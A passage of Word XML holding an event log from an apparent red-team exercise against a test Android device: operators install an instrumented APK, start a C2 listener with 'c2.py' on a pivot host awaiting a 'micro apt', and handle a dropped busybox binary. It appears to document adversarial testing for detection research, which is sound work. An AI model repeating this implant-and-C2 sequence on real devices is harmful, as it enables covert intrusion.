    <w:p w14:paraId="5B0412F7" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4658864B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>15:06</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D24BFB1" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ ls -l myapp.apk                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DAB7FA" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">-rw-r--r-- 1 user user 84804 May 17 18:58 myapp.apk                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D0C106" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ rm myapp.apk                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D89B66F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ exit                                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47287D18" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">logout                                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7753D81C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">Connection to 128.55.12.54 closed.                                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66969491" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">kududyn@kududyn-ProLiant-SL170s-G6:~/tmp$ ssh user@128.55.12.114                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CE7C2E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">user@128.55.12.114's password:          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417ED411" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="399A6479" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate-test ~]$ adb install appstarter-instr.apk                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730D36B1" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">adb: failed to install appstarter-instr.apk: Failure [INSTALL_FAILED_VERSION_DOWNGRADE]  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF8221B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36413EC0" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>15:09</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00111688" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate-test ~]$ adb uninstall de.belu.appstarter                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD88121" w14:textId="6DDA0026" w:rsidR="00A351B2" w:rsidRPr="00650FDF" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">Success     </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF4AB89" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="246" w:name="_Toc12600138"/>
      <w:r>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="246"/>
      <w:r>
        <w:t xml:space="preserve">                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1865A866" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[user@ta1-clearscope-translate-test ~]$ adb install appstarter-instr.apk                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFA0DD3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Success   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F1170B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="210DCE19" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A86B67" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[user@ta1-clearscope-translate-test ~]$ adb shell                                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2D0B7C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">walleye:/ # am start de.belu.appstarter/.MainActivity                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041E6F50" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Starting: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=de.belu.appstarter/.MainActivity }     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA10CAF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23704707" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>No C2 connection!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2561ACE3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F325609" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391B5B61" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[user@ta1-clearscope-translate-test ~]$ adb uninstall de.belu.appstarter                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698D7659" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Success </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73021390" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[user@ta1-clearscope-translate-test ~]$ rm appstarter-instr.apk </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B57659" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1989F1B3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0A30CC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">kududyn@kududyn-ProLiant-SL170s-G6:~/tmp$ scp appstarter-instr.apk user@128.55.12.114:.                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFEFAF9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">user@128.55.12.114's password:                                                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EED569" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">appstarter-instr.apk                                                                               100%   82KB  81.9KB/s   00:00   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7DE467" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB0134B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE0EFDA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[user@ta1-clearscope-translate-test ~]$ adb shell am start de.belu.appstarter/.MainActivity                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435E3C3C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Starting: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=de.belu.appstarter/.MainActivity }  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1139B2ED" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D91DB80" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9EC08E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@ta51-pivot-2:~/tmp/microapt$ sudo python c2.py 80                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584DAF39" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">waiting for connection on port 80                                                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3747FAEB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">waiting for micro apt (ctrl+c to break from loop)                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F71E1B6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EECE2E0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C88A75" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[user@ta1-clearscope-translate-test ~]$ adb uninstall de.belu.appstarter                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3874979A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Success                                                                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE8B467" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[user@ta1-clearscope-translate-test ~]$ adb install appstarter-instr.apk                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595DBBDE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Success                                                                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFD1594" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[user@ta1-clearscope-translate-test ~]$ adb shell am start de.belu.appstarter/.MainActivity                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3731B81E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Starting: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=de.belu.appstarter/.MainActivity }  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0971195D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="247" w:name="_ujo6xa2zo5pu" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="248" w:name="_Toc12600139"/>
      <w:bookmarkEnd w:id="247"/>
      <w:r>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="248"/>
    </w:p>
    <w:p w14:paraId="52E6BCAE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E14C61" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>translate-test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763C1807" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A72A8DE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC5553F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Uninstall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C640A74" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F209AA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74698C9B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[user@ta1-clearscope-translate-test ~]$ adb install appstarter-instr.apk                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10440BF3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Success                                                                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8B23A6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[user@ta1-clearscope-translate-test ~]$ adb shell am start de.belu.appstarter/.MainActivity                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE35DE2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Starting: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=de.belu.appstarter/.MainActivity }      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1695AB5A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[user@ta1-clearscope-translate-test ~]$ adb shell                                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DB661A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">walleye:/ # ls -l /data/data/de.belu.appstarter/                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E8B516" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">total 152                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F77C4F6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">-rwx------ 1 u0_a121 u0_a121       134648 2019-05-17 20:36 busybox                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CC0582" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">drwxrws--x 2 u0_a121 u0_a121_cache   4096 2019-05-17 20:36 cache                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFC1487" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">drwxrws--x 2 u0_a121 u0_a121_cache   4096 2019-05-17 20:36 code_cache                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAC8A1C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">walleye:/ # su u0_a121                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583B32CE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7218F27B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421B5D3B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:39</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED486B6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">walleye:/ $ /data/data/de.belu.appstarter/busybox    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A40CBA3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">16:39255|walleye:/ $ exit                                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D0E5B0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">255|walleye:/ # /data/data/de.belu.appstarter/busybox     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730850A0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2109F31A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">walleye:/data/local/tmp # cp -a /data/data/de.belu.appstarter/busybox /data/local/tmp                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BFF25B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">walleye:/data/local/tmp # ls -l busybox                                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC15297" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">-rwx------ 1 u0_a121 u0_a121 134648 2019-05-17 20:39 busybox                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368A5A46" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">walleye:/data/local/tmp # su u0_a121                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B60D29" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
